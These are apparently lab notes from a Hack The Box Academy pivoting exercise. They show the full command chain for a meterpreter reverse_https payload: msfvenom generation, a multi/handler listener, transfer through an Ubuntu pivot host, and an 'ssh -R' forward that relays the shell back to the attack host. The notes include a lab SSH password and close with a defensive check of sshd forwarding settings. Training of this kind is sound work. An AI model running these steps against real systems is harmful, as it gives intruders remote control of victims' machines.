
SSH remote port forwarding

Scenario


  • We CAN pivot into the Windows A host via the Ubuntu Server.
    • We CAN RDP into the Windows A host
  • But we CANNOT get a reverse shell from Windows A back to the Attack Host

tmux env setup

tmux setenv EXTERNAL_IP_OF_PIVOT_HOST 10.129.196.1
tmux setenv INTERNAL_IP_OF_PIVOT_HOST 172.16.5.129
tmux setenv LOCAL_IP 10.10.14.118
tmux setenv WIN_IP_NET_2 172.16.5.19

ssh ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST
|<- HTB_@cademy_stdnt!

Setup part 1


Creating a Windows Payload with msfvenom

msfvenom -p windows/x64/meterpreter/reverse_https lhost=$INTERNAL_IP_OF_PIVOT_HOST -f exe -o shell.exe LPORT=8080

Configuring & Starting the multi/handler

msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost $LOCAL_IP; set lport 8000; exploit"

Setup part 2


Transferring Payload to Pivot Host (to Victim Server - Ubuntu)

scp shell.exe ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST:~/

Starting Python3 Webserver on Pivot Host (on Victim Server - Ubuntu)

python3 -m http.server 8123

Downloading Payload from Windows Target

Invoke-WebRequest -Uri "http://<INTERNAL_IP_OF_PIVOT_HOST>:8123/shell.exe" -OutFile "C:\shell.exe"

Setup part 3


on Attack Host

ssh -R $INTERNAL_IP_OF_PIVOT_HOST:8080:0.0.0.0:8000 ubuntu@$EXTERNAL_IP_OF_PIVOT_HOST -vN

on Victim Server (Windows A)

.\shell.exe
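
The `ssh -R` step above only makes port 8080 on the pivot host's internal address reachable from Windows A when the pivot's sshd allows remote forwards on non-loopback addresses. As an added example (not part of the original notes), this shell function classifies `sshd -T` output for that condition; the function name and the sample config lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: classify effective sshd settings (lines as printed by
# `sshd -T`) by how far an `ssh -R bind_ip:port:...` listener can reach.
remote_forward_exposure() {   # hypothetical helper name
    awk '
        { key = tolower($1); val = tolower($2) }
        key == "allowtcpforwarding" { fwd = val }
        key == "gatewayports"       { gw  = val }
        END {
            # OpenSSH defaults, used if a keyword is missing from the input
            if (fwd == "") fwd = "yes"
            if (gw  == "") gw  = "no"
            if (fwd == "no" || fwd == "local") print "blocked"
            else if (gw == "no")               print "loopback-only"
            else                               print "network-reachable"
        }'
}

# Constructed sample inputs (not captured from a real host).
SAMPLE_DEFAULT='port 22
allowtcpforwarding yes
gatewayports no'
SAMPLE_PIVOT='port 22
allowtcpforwarding yes
gatewayports clientspecified'
SAMPLE_HARDENED='port 22
allowtcpforwarding local
gatewayports no'

for cfg in "$SAMPLE_DEFAULT" "$SAMPLE_PIVOT" "$SAMPLE_HARDENED"; do
    printf '%s\n' "$cfg" | remote_forward_exposure
done
```

On a live server, run `sshd -T | remote_forward_exposure` as root to check the real effective configuration. A `network-reachable` verdict on a host that should not relay traffic is fixed by setting `GatewayPorts no`, or `AllowTcpForwarding` to `no` or `local`.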